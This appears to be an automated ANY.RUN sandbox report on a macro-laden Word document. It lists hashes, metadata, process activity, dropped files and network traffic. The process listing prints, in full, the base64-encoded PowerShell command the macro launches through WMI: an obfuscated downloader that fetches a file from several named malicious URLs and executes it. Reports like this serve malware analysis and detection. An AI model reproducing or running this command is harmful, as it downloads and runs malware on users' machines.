analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118

Full analysis: https://app.any.run/tasks/8b9eef2f-d3a6-4834-8a2a-23199bb90d28
Verdict: Malicious activity
Analysis date: May 23, 2024, 15:47:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
generated-doc
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Sed., Author: Camille Paul, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 15 11:47:00 2020, Last Saved Time/Date: Tue Sep 15 11:47:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 30, Security: 0
MD5:

6A2B3BA62EBAD22DD23CD14B6D42D7EF

SHA1:

DB9097BA735D3CED9CD49ABE979511821A954A39

SHA256:

FE150DE0643BAF316AD789B237F7BF6BA328D36628712DA3BD32923A677ACB0F

SSDEEP:

1536:pI491Y2wcI491Y2wpiMP4VjYh+/XQihFN1IYmQoCLmr0bgPvkJhR5L1ktKRpPG+7:WiPV9/X3r740bgPCHPktKbPGVa55X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 6264)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 6824)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 6264)
    • Reads security settings of Internet Explorer

      • TextInputHost.exe (PID: 7056)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6824)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 6824)
    • Process requests binary or script from the Internet

      • WINWORD.EXE (PID: 6264)
    • Unusual connection from system programs

      • powershell.exe (PID: 6824)
  • INFO

    • An automatically generated document

      • WINWORD.EXE (PID: 6264)
    • Checks supported languages

      • TextInputHost.exe (PID: 7056)
    • Reads mouse settings

      • WINWORD.EXE (PID: 6264)
    • Reads the computer name

      • TextInputHost.exe (PID: 7056)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6824)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6824)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 6824)
    • Disables trace logs

      • powershell.exe (PID: 6824)
    • Checks proxy server information

      • powershell.exe (PID: 6824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Lines: 1
Paragraphs: 1
Pages: 2
Characters: 30
Words: 5
TotalEditTime: -
RevisionNumber: 1
LastPrinted: 0000:00:00 00:00:00
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 34
Company: -
Security: None
ModifyDate: 2020:09:15 11:47:00
CreateDate: 2020:09:15 11:47:00
Software: Microsoft Office Word
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Camille Paul
Subject: -
Title: Sed.
Word97: No
System: Windows
DocFlags: Has picture, 1Table, ExtChar
LanguageCode: English (US)
Identification: Word 8.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe conhost.exe no specs ai.exe no specs textinputhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6264"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6824powershell -e JABKAGkAdQA1AHcAawBxAD0AKAAoACcATwBpACcAKwAnAGEAJwApACsAJwA0AHkAJwArACcAbgB1ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAVQBTAGUAUgBQAHIATwBmAGkAbABlAFwAdAA2AGEAOABDAGsATQBcAHIARwBBAGkAXwBoAF8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAUgBJAFQAYAB5AGAAcAByAG8AVABPAGAAQwBvAGwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxADIALAAnACsAJwAgAHQAbABzADEAJwApACsAJwAxACcAKwAoACcALAAnACsAJwAgAHQAJwApACsAJwBsAHMAJwApADsAJABJAHMAZwB1AG4AMgB2ACAAPQAgACgAJwBDACcAKwAnADgAJwArACgAJwBfAGcAMABwAHYAJwArACcAMwAnACkAKQA7ACQAWgB5AGcAcwBnAGsAZQA9ACgAJwBYACcAKwAoACcAaABmACcAKwAnAGcAMwBrACcAKQArACcAcwAnACkAOwAkAEIAbgBzAGwAbgB0AG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AVAA2AGEAOABjAGsAJwArACcAbQAnACsAJwB7ADAAfQBSAGcAYQBpACcAKwAnAF8AJwArACcAaABfAHsAMAB9ACcAKQAgACAALQBGACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQASQBzAGcAdQBuADIAdgArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAFUAbgA2AGsAdQA2AGsAPQAoACgAJwBNAGYAJwArACcAYwAnACkAKwAoACcAaQA0ACcAKwAnAGwAOQAnACkAKQA7ACQASAAxADgAdwBnAGUAdgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAFQALgBXAEUAQgBjAEwASQBlAG4AVAA7ACQAVAAwAHIAbgBrADYAOQA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwA6AC8AJwArACgAJwAvACcAKwAnAGwAbwB1ACcAKQArACcAbgAnACsAJwBnACcAKwAoACcAZQBnACcAKwAnAGEAJwApACsAJwBuACcAKwAnAGcAbgAnACsAJwBhACcAKwAoACcAbQAuAGMAbwBtAC8AJwArACcANAAnACsAJwBXAC8AJwApACsAKAAnAGQAegAvACoAJwArACcAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAGkAJwArACcAbgBkAHkAbwB2AGUAcgBoACcAKQArACcAZQAnACsAKAAnAGEAJwArACcAZABkAG8AbwAnACkAKwAoACcAcgBzAC4AJwArACcAYwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AaQBuAGMAbAAnACsAJwB1ACcAKQArACgAJwBkAGUAcwAvACcAKwAnAHAAWgAnACkAKwAoACcALwAnACsAJwAqAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKQArACcAZwBlACcAKwAoACcAbwAnACsAJwBmAGYAbwBnACcAKQArACgAJwBsAGUAJwArACcAbQAnACsAJwB1AHMAJwArACcAaQBjAC4AYwBvAG0AJwApACsAJwAvAHcAJwArACgAJwBwACcAKwAnAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAJwArACcAbgAvACcAKwAnAHcALwAqAGgAdAAnACsAJwB0AHAAOgAvAC8AJwApACsAKAAnAGcAaQByACcAKwAnAGEAbAAyACcAKQArACgAJwAuAGMAJwArACcAbwAnACsAJwBtACcAKwAnAC8AdwBwAC0AaQBuACcAKQArACcAYwAnACsAJwBsACcAKwAoACcAdQBkAGUAcwAvADAAJwArACcAZQAvACcAKQArACgAJwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwACcAKwAnAHMAOgAnACkAKwAoACcALwAvAHcAJwArACcAdwB3AC4AJwArACcAbAAnACkAKwAnAHUAbgAnACsAJwBhACcAKwAoACcAbAB5AHMAJwArACcAaQAnACsAJwBzAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3ACcAKwAnAG8AJwArACgAJwByACcAKwAnAGQAcAAnACkAKwAoACcAcgAnACsAJwBlAHMAcwAvAHMAeQAnACkAKwAnAGIAJwArACcALwAnACsAKAAnACoAJwArACcAaAB0AHQAJwApACsAKAAnAHAAJwArACcAOgAvACcAKQArACcALwAnACsAKAAnAGYAYQByAGwAJwArACcAaQAuAGMAJwApACsAKAAnAG8AbQAnACsAJwAvACcAKQArACcAYwBnACcAKwAnAGkALQAnACsAKAAnAGIAaQBuAC8AagAnACsAJwBLAC8AJwArACcAKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvAC8AJwArACgAJwBnACcAKwAnAG8AbABkAGMAbwAnACkAKwAnAGEAcwAnACsAJwB0AG8AJwArACgAJwBmACcAKwAnAGYAaQAnACkAKwAnAGMAZQAnACsAJwAzACcAKwAnADYAJwArACcANQAnACsAKAAnAC4AJwArACcAYwBvACcAKQArACcAbQAnACsAJwAvACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAHAALwAnACsAJwB3ACcAKwAnAFEAJwArACcALwAnACkALgAiAHMAUABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVQA0AHcAeABqADEAbwA9ACgAJwBYACcAKwAoACcAawAzAGcAbwAnACsAJwBtAGwAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAHkANAAzAGIAXwBtACAAaQBuACAAJABUADAAcgBuAGsANgA5ACkAewB0AHIAeQB7ACQASAAxADgAdwBnAGUAdgAuACIAZABvAGAAVwBuAGwATwBBAEQAYABGAGkATABFACIAKAAkAEgAeQA0ADMAYgBfAG0ALAAgACQAQgBuAHMAbABuAHQAbwApADsAJABOADMAZgBjADIAcwByAD0AKAAnAEoAJwArACcAdQAnACsAKAAnAGEAYgAnACsAJwBoADgAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABCAG4AcwBsAG4AdABvACkALgAiAGwARQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMwAxADUAOAA1ACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAEIAbgBzAGwAbgB0AG8AKQA7ACQATgBwADAAegA2AGcAYwA9ACgAKAAnAFgAJwArACcAbwBrACcAKQArACcAZAAnACsAKAAnAGUAJwArACcAaQBmACcAKQApADsAYgByAGUAYQBrADsAJABNADEAYgBmADYANwBrAD0AKAAnAE0AagAnACsAJwB6ADEAJwArACgAJwBtADIAJwArACcAXwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQA4ADcAOQBtADkAeAA9ACgAKAAnAEMAZAA2ACcAKwAnAGUAJwApACsAKAAnAGgAYgAnACsAJwBqACcAKQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6888"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "18DB105C-E8AD-41F6-993B-2C17662A21CD" "218A834A-1024-4318-ABB5-0D532EC7B820" "6264"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\program files\common files\microsoft shared\clicktorun\c2r64.dll
7056"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
123.26505.0.0
Modules
Images
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\textinputhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\vcruntime140_app.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
Total events
22 538
Read events
22 220
Write events
296
Delete events
22

Modification events

(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E01000000000000000500000000000000
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete valueName:0
Value:
ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨…ީ湕湫睯쥮௅賙ᒳ೅肫
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete keyName:(default)
Value:
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6264
Operation:writeName:0
Value:
0B0E10CBCC11FB28FA18478D8E50F37EA914D9230046C3C88DDF88A5ABED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511F830D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(6264) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
0
Suspicious files
15
Text files
16
Unknown types
0

Dropped files

PID
Process
Filename
Type
6264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\6a2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.doc.LNK
MD5:
SHA256:
6264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
6264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFZSBAH0CNNCP0VTBMKB.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
6824powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zmkrema4.j5b.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:F44F7841121B9A676F9F6C31362F586D
SHA256:60DDC4C5230A69F5E4B59068E1760BCA899DFCD06FB4E9223C3C239DBA7A551A
6264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmabr
MD5:49E13D4B6F2CB1DAAD24D15F444152E0
SHA256:31F8B3F5DDD98EAF29FE6ABDF9C5E09D1BA137C6031261ADD25F8F06DD27D45A
6264WINWORD.EXEC:\Users\admin\Desktop\~$2b3ba62ebad22dd23cd14b6d42d7efJaffaCakes118.docabr
MD5:50F7D950C096D67968A941F0DDC7BFD6
SHA256:26D5DCF52C345A5807FEBE73CFC9EB37EEC39E3E9367F16E91731A9F361D67CE
6824powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yo4auozl.out.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:629D41CE43F78D3B4080545D7462FB41
SHA256:5CCC5BF5CA513713AC9ED24A6A9B42A5862AF31621B09D3F56C08C3F3C0D8BD4
6264WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdbinary
MD5:6E11D7D8A24D27CAD9796205CFFA979E
SHA256:265B488870ED050856884588A589B0228F6F81F60DD37C11E45CD9F3D366401E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
74
TCP/UDP connections
82
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5140
MoUsoCoreWorker.exe
GET
200
2.16.164.51:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5944
RUXIMICS.exe
GET
200
2.16.164.51:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
4080
svchost.exe
GET
200
2.16.164.51:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
4080
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
6824
powershell.exe
GET
49.13.77.253:80
http://loungegangnam.com/4W/dz/
unknown
unknown
5140
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
5944
RUXIMICS.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
1608
svchost.exe
POST
40.126.31.67:443
https://login.live.com/RST2.srf
unknown
POST
20.190.159.4:443
https://login.live.com/RST2.srf
unknown
POST
20.190.159.68:443
https://login.live.com/RST2.srf
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4080
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
239.255.255.250:1900
unknown
5944
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5140
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4080
svchost.exe
2.16.164.51:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
5944
RUXIMICS.exe
2.16.164.51:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
5140
MoUsoCoreWorker.exe
2.16.164.51:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
4080
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
unknown
4680
SearchApp.exe
2.23.209.189:443
www.bing.com
Akamai International B.V.
GB
unknown
1608
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.51
  • 2.16.164.106
  • 2.16.164.18
  • 2.16.164.49
  • 2.16.164.107
  • 2.16.164.32
  • 2.16.164.82
  • 2.16.164.81
  • 2.16.164.73
whitelisted
www.bing.com
  • 2.23.209.189
  • 2.23.209.140
  • 2.23.209.149
  • 2.23.209.179
  • 2.23.209.182
  • 2.23.209.130
  • 2.23.209.133
whitelisted
r.bing.com
  • 2.23.209.189
  • 2.23.209.149
  • 2.23.209.133
  • 2.23.209.140
  • 2.23.209.130
  • 2.23.209.182
  • 2.23.209.179
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
login.live.com
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.4
  • 20.190.159.73
  • 20.190.159.23
  • 20.190.159.75
  • 40.126.31.69
whitelisted
go.microsoft.com
  • 2.19.246.123
whitelisted
loungegangnam.com
  • 49.13.77.253
malicious
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
roaming.officeapps.live.com
  • 52.109.89.19
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.